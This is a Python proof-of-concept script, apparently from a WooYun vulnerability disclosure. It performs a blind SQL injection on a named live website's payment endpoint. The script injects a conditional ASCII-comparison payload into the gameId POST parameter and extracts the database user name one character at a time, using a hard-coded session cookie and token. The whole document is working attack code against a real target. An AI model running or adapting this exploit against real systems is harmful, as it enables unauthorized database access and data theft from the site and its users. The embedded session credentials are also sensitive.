WooYun.org

#!/usr/bin/env python
#-*-coding:utf-8-*-
'''
url='http://www.ibidian.com/pay/pay/get_server_list'
post
gameId=165 and length(user())=26&cache=1451107818
cookie='login_start=1; user_id=cO5txlA6%2FB1rAAq7YXVGXg%3D%3D; user_name=wooyun; nickname=wooyun; user_icon=http%3A%2F%2Fimg.funshion.com%2Fimg%2Fdefault%2Fhead_s_m.jpg; ads_id=1; page_id=1; cookie_timeout=0; token=JM0lbOGuGr9b7rifs51kqqOY9TJ2br_z_mG-glStU_eDUdX4YBAM7xoSFrYQoGsOcLK4Coke14FATjDcImGVazVEJJP9bceszW5Rltw4NK8; encrypted=cO5txlA6%2FB1rAAq7YXVGXg%3D%3D'
'''
import requests
url='http://www.ibidian.com/pay/pay/get_server_list'
cookie='login_start=1; user_id=cO5txlA6%2FB1rAAq7YXVGXg%3D%3D; user_name=wooyun; nickname=wooyun; user_icon=http%3A%2F%2Fimg.funshion.com%2Fimg%2Fdefault%2Fhead_s_m.jpg; ads_id=1; page_id=1; cookie_timeout=0; token=JM0lbOGuGr9b7rifs51kqqOY9TJ2br_z_mG-glStU_eDUdX4YBAM7xoSFrYQoGsOcLK4Coke14FATjDcImGVazVEJJP9bceszW5Rltw4NK8; encrypted=cO5txlA6%2FB1rAAq7YXVGXg%3D%3D'
referer='http://www.ibidian.com/pay/pay/index'
user_agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'
payloads='abcdefghijklmnopqrstuvwxyz._@ 0123456789'
user=''
headers={'Cookie':cookie,'Referer':referer,'User-Agent':user_agent}
for i in range(1,27):
	for p in payloads:
		gameid='165 and if(ascii(substr(user(),{},1))={},1,0)'.format(i,ord(p))
		data={'gameId':gameid,'cache':'1451107818'}
		req=requests.post(url,data=data,headers=headers)
		if len(req.text)>1000:
			user=user+p
			print '\n[User]: '+user+'\n'
			break
		print gameid
print '[FINISH]: '+user